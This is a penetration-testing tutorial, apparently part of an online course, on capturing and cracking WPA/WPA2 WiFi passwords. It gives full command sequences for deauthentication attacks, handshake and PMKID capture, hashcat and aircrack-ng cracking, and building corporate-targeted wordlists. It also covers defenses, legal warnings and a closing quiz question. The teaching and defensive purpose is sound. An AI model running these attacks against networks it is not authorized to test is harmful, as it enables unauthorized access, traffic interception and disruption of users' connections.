Wireless Network Password Attacks

Capturing and cracking WPA/WPA2 wireless security

WiFi Security Handshake Capture Network Penetration

What You'll Discover

🎯 Why This Matters

Wireless network security assessment represents a critical component of modern penetration testing. Organizations deploy WiFi networks throughout their facilities, often without fully understanding the security implications. WPA2 and WPA3 encryption provide strong cryptographic protection, but weak passwords remain the fundamental vulnerability that enables unauthorized network access. Security professionals need wireless password cracking skills to assess the actual security posture of WiFi deployments, identify weak authentication, and demonstrate attack feasibility before malicious actors exploit these weaknesses to gain network access, intercept traffic, or pivot to internal systems.

🔍 What You'll Learn

You'll master professional wireless password cracking tools including aircrack-ng, hashcat, hcxdumptool, and wifite2, understand WPA/WPA2 4-way handshake capture and cracking, learn modern PMKID attack techniques that bypass client authentication requirements, and develop skills in wireless reconnaissance, packet capture, and password recovery. These techniques are essential for wireless penetration testing, security assessments of enterprise WiFi deployments, and understanding the attack surface that wireless networks present to both internal and external threats.

🚀 Your First Win

In the next 20 minutes, you'll understand how WPA2 handshake capture works, learn to extract authentication hashes from wireless networks, and know exactly how security professionals crack WiFi passwords during penetration tests.

🔧 Try This Right Now

Let's explore wireless network reconnaissance to understand the attack workflow (requires WiFi adapter with monitor mode support):

# Install aircrack-ng suite (contains wireless tools)
# Ubuntu/Debian
sudo apt update && sudo apt install aircrack-ng

# Kali Linux (pre-installed)
# Already includes aircrack-ng, airmon-ng, airodump-ng

# macOS requires specific WiFi adapter - built-in won't work
# Recommended: Alfa AWUS036ACH or similar monitor mode capable adapter

# Check your wireless interface
iwconfig
# Look for: wlan0, wlp2s0, or similar

# Enable monitor mode on your wireless adapter
sudo airmon-ng start wlan0
# This creates mon0 or wlan0mon interface

# Scan for nearby wireless networks
sudo airodump-ng wlan0mon

# You'll see:
# - BSSID (AP MAC address)
# - PWR (signal strength)
# - Beacons (AP advertisements)
# - CH (channel)
# - ENC (encryption type: WPA, WPA2, WPA3)
# - ESSID (network name)

# Stop monitor mode when done
sudo airmon-ng stop wlan0mon

# NOTE: Only perform these techniques on networks you own or
# have explicit written permission to test. Unauthorized access
# to wireless networks violates computer fraud laws.

You'll see: All wireless networks in range with their security configurations. This reconnaissance phase identifies WPA2 networks (the primary target), signal strength (proximity), and number of connected clients (for handshake capture). Understanding this workflow prepares you for professional wireless security assessments.

Skills You'll Master

✅ Core Understanding

  • WPA/WPA2 4-way handshake authentication process
  • PMKID extraction and attack methodology
  • Wireless packet capture and analysis
  • WiFi encryption protocols and vulnerabilities

🔍 Expert Skills

  • Advanced deauthentication attack techniques
  • GPU-accelerated wireless password cracking
  • Enterprise WPA/WPA2-Enterprise assessment
  • Automated wireless penetration with wifite2

Understanding Wireless Security

WPA2 (Wi-Fi Protected Access 2) implements robust cryptographic protection using AES-CCMP encryption and secure key derivation through the 4-way handshake. When a client connects to a WPA2 network, the access point and client perform a mutual authentication exchange that generates unique session keys derived from the Pre-Shared Key (PSK) - the WiFi password. This handshake exchange contains cryptographic material that enables offline password cracking attacks. Security professionals capture these handshakes and use specialized tools to test password strength without requiring continuous network access.

🔐 WPA2 4-Way Handshake

AP → Client: ANonce (random number from AP)
Client → AP: SNonce + MIC (proves client knows password)
AP → Client: GTK + MIC (group temporal key)
Client → AP: ACK (handshake complete, session keys derived)

The Weakness

The 4-way handshake contains sufficient cryptographic material to verify password guesses offline, enabling unlimited password testing without network interaction or detection.

The Attack

Capture handshake packets during client authentication, extract cryptographic hashes, then apply offline dictionary or brute force attacks to recover the PSK password.

The Result

Complete network access with ability to intercept traffic, pivot to internal systems, and maintain persistent unauthorized access to the wireless network.

The WPA2 security protocol specification describes the authentication process in detail, but the fundamental vulnerability remains password strength. The cryptographic implementation is sound - AES-256 provides robust encryption and PBKDF2 with 4,096 iterations creates the Pairwise Master Key (PMK). However, weak passwords enable successful cracking regardless of encryption strength. An 8-character password using lowercase letters and numbers can be cracked in hours, while a 12+ character password with high entropy resists current cracking capabilities.

Modern PMKID attacks represent an evolution in wireless password cracking methodology. Discovered in 2018 by Jens Steube (hashcat creator), the PMKID attack exploits a design oversight in the WPA2 Robust Security Network Information Element (RSN IE). The access point includes the PMKID in the first frame of the 4-way handshake, calculated as HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA). This single frame contains sufficient information to perform offline password attacks without requiring a complete handshake or client presence. Tools like hcxdumptool can extract PMKIDs directly from access points, dramatically simplifying the attack workflow and eliminating the need for client deauthentication attacks.

Tools and Techniques

🔨 aircrack-ng Suite: Traditional Handshake Capture

The aircrack-ng suite represents the industry standard for wireless security assessment, providing comprehensive tools for monitor mode enablement, packet capture, handshake analysis, and password cracking. This suite includes airmon-ng (monitor mode), airodump-ng (packet capture), aireplay-ng (deauthentication), and aircrack-ng (password cracking).

# Enable monitor mode
sudo airmon-ng start wlan0
# Creates wlan0mon interface

# Scan for target network
sudo airodump-ng wlan0mon

# Capture handshake on specific channel
# Replace: BSSID with AP MAC, CH with channel, ESSID with network name
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

# In another terminal: Force client deauth to capture handshake
# This causes client to reconnect and transmit handshake
sudo aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF wlan0mon

# Watch airodump-ng output for: "WPA handshake: AA:BB:CC:DD:EE:FF"
# This confirms successful capture

# Crack the captured handshake
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b AA:BB:CC:DD:EE:FF capture-01.cap

# Result shows password if found in wordlist
# Example output: "KEY FOUND! [ password123 ]"

The aircrack-ng approach requires capturing a complete 4-way handshake, which necessitates client presence and connection activity. The deauthentication attack forcibly disconnects clients, causing them to reconnect and transmit the handshake. While effective, this approach generates noticeable network disruption and may trigger security monitoring. The captured .cap file contains the EAPOL frames with authentication data, which aircrack-ng uses to verify password guesses by computing the PMK and comparing derived values.

⚡ hcxdumptool + hashcat: Modern PMKID Attacks

The hcxdumptool and hcxtools suite enables modern PMKID-based wireless attacks that eliminate the need for client presence or deauthentication. Combined with hashcat's GPU acceleration, this approach represents the current state-of-the-art in wireless password cracking.

# Install hcxdumptool and hcxtools
# Ubuntu/Debian
sudo apt install hcxdumptool hcxtools

# Kali Linux
sudo apt install hcxdumptool hcxtools

# Enable monitor mode (if not already enabled)
sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo ip link set wlan0 up

# Capture PMKIDs from nearby APs (no clients required!)
sudo hcxdumptool -i wlan0 -o capture.pcapng --enable_status=1

# Run for 5-10 minutes to capture PMKIDs from multiple APs
# Status shows: PMKIDs captured, handshakes captured, APs detected

# Convert capture to hashcat format
hcxpcapngtool -o hashes.hc22000 capture.pcapng

# Examine captured hashes
cat hashes.hc22000
# Format: WPA*02*PMKID*MAC_AP*MAC_CLIENT*ESSID

# Crack with hashcat (mode 22000 for WPA-PMKID-PBKDF2)
hashcat -m 22000 -a 0 hashes.hc22000 rockyou.txt

# GPU-accelerated cracking
hashcat -m 22000 -a 0 hashes.hc22000 rockyou.txt -w 3

# Rule-based attack for password mutations
hashcat -m 22000 -a 0 hashes.hc22000 rockyou.txt -r rules/best64.rule

# Mask attack for known patterns
hashcat -m 22000 -a 3 hashes.hc22000 '?u?l?l?l?l?l?l?d?d'

The PMKID attack works because access points include this value in the RSN IE of the first EAPOL frame. The original PMKID attack disclosure by hashcat demonstrated that this single frame provides everything needed for offline password attacks. Unlike traditional handshake capture, PMKID attacks don't require client deauthentication, making them stealthier and more reliable. However, not all access points are vulnerable - some vendors have implemented mitigations that prevent PMKID extraction.

🚀 wifite2: Automated Wireless Attacks

Wifite2 provides fully automated wireless network auditing, combining reconnaissance, handshake capture, PMKID extraction, and password cracking into a single streamlined workflow. This tool is ideal for rapid assessment of multiple wireless networks.

# Install wifite2
# Ubuntu/Debian
sudo apt install wifite

# Kali Linux (pre-installed)
wifite --help

# Run automated attack (handles everything automatically)
sudo wifite

# Wifite will:
# 1. Enable monitor mode automatically
# 2. Scan for wireless networks
# 3. Let you select target(s)
# 4. Attempt PMKID capture first (fast, stealthy)
# 5. Fall back to handshake capture if needed
# 6. Crack passwords automatically

# Target specific network by ESSID
sudo wifite --essid "TargetNetwork"

# Target networks by encryption type
sudo wifite --wpa

# Use custom wordlist
sudo wifite --dict /path/to/wordlist.txt

# Skip cracking, just capture handshakes
sudo wifite --no-crack

# Attack WPS (if enabled on AP)
sudo wifite --wps

# Verbose output for debugging
sudo wifite --verbose

Wifite2 handles the complexity of wireless attacks automatically, making it accessible for security assessors who need rapid results. The tool integrates with aircrack-ng, reaver (WPS attacks), bully, and other utilities to provide comprehensive attack coverage. It automatically detects the best attack method for each target and handles error recovery. While convenient, understanding the underlying techniques remains important for troubleshooting and advanced scenarios.

🎯 Advanced Techniques and Optimization

Professional wireless assessments require understanding advanced capture techniques, attack optimization, and troubleshooting methods for challenging scenarios.

# Verify handshake quality before cracking
# Incomplete handshakes waste cracking time
aircrack-ng -w test.txt capture-01.cap
# Should show: "1 handshake" not "0 handshakes"

# Convert .cap to hashcat format
hcxpcapngtool -o handshake.hc22000 capture-01.cap

# Clean and optimize capture files
# Remove duplicate frames and non-WPA traffic
wpaclean cleaned.cap dirty.cap

# Targeted deauthentication (specific client)
aireplay-ng --deauth 5 -a AP_MAC -c CLIENT_MAC wlan0mon

# Continuous monitoring for multiple handshakes
# Useful in busy environments with many clients
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w multi-capture wlan0mon

# Hashcat optimization for wireless cracking
# Use --force if getting OpenCL errors
hashcat -m 22000 hashes.hc22000 rockyou.txt --force

# Status during cracking (press 's')
# Shows speed, progress, estimated time

# Combination attacks for corporate WiFi
# Combine company name with common patterns
hashcat -m 22000 -a 1 hashes.hc22000 company.txt patterns.txt

# Troubleshooting: Check if handshake is valid
tshark -r capture-01.cap -Y eapol
# Should show 4 EAPOL frames (or minimum 2)

Handshake quality verification prevents wasted time on invalid captures. A complete 4-way handshake contains four EAPOL frames, but only frames 2 and 3 (or sometimes 1 and 2) are required for password cracking. Converting captures to hashcat format enables GPU acceleration, providing 100-1000x speed improvements over CPU-based aircrack-ng. For corporate wireless networks, custom wordlists incorporating company-specific terms dramatically increase success rates.

Defensive Countermeasures

🛡️ Strong WiFi Password Policies

Wireless network security fundamentally depends on password strength. Organizations must implement and enforce robust WiFi password policies that account for offline cracking capabilities. The NIST cybersecurity framework recommends specific password requirements for wireless networks that assume attackers will capture handshakes and attempt offline cracking.

  • Minimum 20 character passwords: Long passphrases resist brute force attacks effectively
  • High entropy requirements: Mix uppercase, lowercase, numbers, symbols - avoid dictionary words
  • Regular password rotation: Change WiFi passwords quarterly or after employee departures
  • Unique passwords per SSID: Different passwords for guest, employee, and management networks

🔐 WPA3 Migration and Enterprise Authentication

WPA3 addresses fundamental vulnerabilities in WPA2's 4-way handshake through Simultaneous Authentication of Equals (SAE), which provides forward secrecy and resistance to offline dictionary attacks. For enterprise environments, WPA2/WPA3-Enterprise with 802.1X authentication eliminates PSK vulnerabilities entirely.

  • WPA3 deployment: Upgrade to WPA3-capable access points and enforce WPA3-only mode
  • WPA2/WPA3 transition mode: Support both during migration period, then disable WPA2
  • 802.1X/RADIUS authentication: Individual user credentials instead of shared passwords
  • Certificate-based authentication: EAP-TLS with client certificates for highest security

⚡ Wireless Intrusion Detection and Prevention

Enterprise wireless infrastructure should include Wireless Intrusion Detection Systems (WIDS) and Wireless Intrusion Prevention Systems (WIPS) that detect and respond to attack activity including handshake capture attempts, deauthentication attacks, and rogue access points.

  • Deauthentication attack detection: Monitor for excessive deauth frames and block attacking devices
  • Rogue AP detection: Identify unauthorized access points using company SSIDs
  • Client isolation: Prevent clients from directly communicating (stops lateral movement)
  • Management Frame Protection (802.11w): Cryptographically protect deauthentication frames

🔍 Network Segmentation and Monitoring

Wireless networks should be treated as untrusted and segregated from critical internal resources through network segmentation, VLANs, and firewall policies that assume wireless compromise.

  • VLAN segmentation: Separate wireless networks from wired infrastructure
  • Firewall policies: Restrict wireless network access to internet only, block internal resources
  • Guest network isolation: Complete separation with bandwidth limiting and content filtering
  • Monitoring and logging: Comprehensive logging of authentication attempts and network access

FAQ

Wireless Password Cracking Basics

How do I crack a WPA2 WiFi password?

To crack WPA2 WiFi passwords, capture the 4-way handshake using tools like airodump-ng while a client authenticates to the network (use aireplay-ng deauthentication to force reconnection), or use hcxdumptool to extract PMKIDs which don't require client presence. Convert the captured data to hashcat format with hcxpcapngtool, then crack with hashcat using dictionary attacks, rule-based mutations, or mask attacks. GPU acceleration dramatically improves cracking speed. Success depends entirely on password strength - weak passwords crack in minutes, strong 20+ character passwords resist cracking indefinitely.

What's the difference between capturing handshakes and PMKID attacks?

Traditional handshake capture requires waiting for a client to authenticate (or forcing reconnection via deauthentication), then capturing the complete 4-way EAPOL exchange between client and access point. PMKID attacks, discovered in 2018, extract the PMKID value directly from the access point's first EAPOL frame without requiring client presence or deauthentication. PMKID attacks are faster, stealthier, and more reliable, but not all access points are vulnerable - some vendors have patched this. Use hcxdumptool for PMKID attacks and aircrack-ng suite for traditional handshake capture.

Which WiFi adapter works best for wireless password cracking?

Wireless password cracking requires WiFi adapters that support monitor mode and packet injection. The Alfa AWUS036ACH (dual-band AC1200) is widely recommended for modern networks supporting 2.4GHz and 5GHz with excellent monitor mode support. Alfa AWUS036NHA works well for 2.4GHz-only networks. TP-Link TL-WN722N v1 (not v2/v3) is budget-friendly for 2.4GHz. Most built-in laptop WiFi cards don't support monitor mode or packet injection. Check wireless adapter compatibility lists before purchasing.

Technical Implementation

How long does it take to crack different WiFi password types?

Cracking time varies enormously based on password strength and hardware. Simple 8-character passwords using dictionary words crack in seconds to minutes. 8-10 character passwords with mixed character types may take hours to days depending on complexity. 12-15 character passwords with high entropy take weeks to months even with powerful GPUs. 20+ character random passwords are effectively uncrackable with current technology. WPA2 uses PBKDF2 with 4,096 iterations which slows cracking compared to other hash types. High-end GPUs achieve 300,000-1,000,000 passwords/second for WPA2, while CPUs only manage 1,000-10,000/second.

What's the minimum handshake data needed for password cracking?

You need at minimum EAPOL frames 2 and 3 (or sometimes 1 and 2) from the 4-way handshake to successfully crack WPA2 passwords. Frame 2 contains the client's SNonce and MIC (Message Integrity Check) proving the client knows the password. Frame 3 contains the AP's confirmation. These two frames provide sufficient cryptographic material to verify password guesses offline. The complete 4-way handshake contains four EAPOL frames, but not all are required for cracking. Verify handshake completeness with aircrack-ng or tshark before attempting to crack.

Practical Applications

Why do deauthentication attacks sometimes fail to capture handshakes?

Deauthentication attacks may fail for several reasons: client devices don't immediately reconnect (mobile devices often wait), management frame protection (802.11w) blocks deauth frames, the client was already connected (send deauth to specific client MAC), signal strength is too weak (move closer to AP), or you're on the wrong channel. Use targeted deauthentication against specific client MACs instead of broadcast deauth. Ensure your adapter supports packet injection (test with aireplay-ng --test). Try PMKID attacks with hcxdumptool as an alternative that doesn't require deauthentication or client presence.

Can I crack WPA3 passwords the same way as WPA2?

No, WPA3 uses Simultaneous Authentication of Equals (SAE) instead of the 4-way handshake, which provides forward secrecy and resistance to offline dictionary attacks. The SAE handshake doesn't expose password verification data in captured packets, making traditional WPA2 cracking methods ineffective. WPA3 is vulnerable to side-channel attacks and implementation flaws (like Dragonblood vulnerabilities discovered in 2019), but these require different attack techniques than WPA2 password cracking. Organizations should still use strong passwords with WPA3 as defense-in-depth, but WPA3's cryptographic design significantly improves resistance to password cracking attacks.

What password patterns work best for corporate WiFi cracking?

Corporate WiFi networks often use predictable password patterns: company name + year, department + "WiFi" + year, project names + quarters, or building/floor identifiers. Create custom wordlists from OSINT gathering - company website, LinkedIn profiles, press releases, product names, office locations. Common patterns include CompanyName2024, OfficeWiFi2024!, DeptSecure2024, Building1Guest. Use hashcat rules to generate mutations (capitalization, l33t speak, year appending, special character suffixes). Combination attacks joining company terms with common passwords are highly effective. Target guest networks first as they typically have weaker passwords than employee networks.

Is wireless password cracking legal?

Wireless password cracking is legal only on networks you own or have explicit written permission to test. Unauthorized access to wireless networks violates the Computer Fraud and Abuse Act (CFAA) in the US and similar laws globally. Even capturing handshakes without authorization may constitute illegal interception. Professional penetration testers obtain detailed written authorization (rules of engagement) before wireless security assessments. Testing on your own home network is legal. Using WiFi without permission, even if unencrypted, is illegal in most jurisdictions. Always obtain proper authorization, maintain documentation, and stay within the defined scope of testing.

🎯 You've Got Wireless Password Cracking Down!

You now understand WPA/WPA2 authentication mechanisms, can capture 4-way handshakes and PMKIDs, and know how to crack wireless passwords using professional tools like aircrack-ng, hashcat, and hcxdumptool. These skills are essential for wireless penetration testing, security assessments of enterprise WiFi deployments, and understanding the attack surface that wireless networks present to both internal and external threats.

Wireless Security Handshake Capture PMKID Attacks Network Pentesting

Ready to explore Windows system password recovery techniques

Knowledge Validation

Demonstrate your understanding to earn points and progress

1
Chapter Question

What is the hashcat mode number used for cracking WPA2-PMKID and WPA2-EAPOL hashes? (Example format: 12345)

1
Read
2
Validate
3
Complete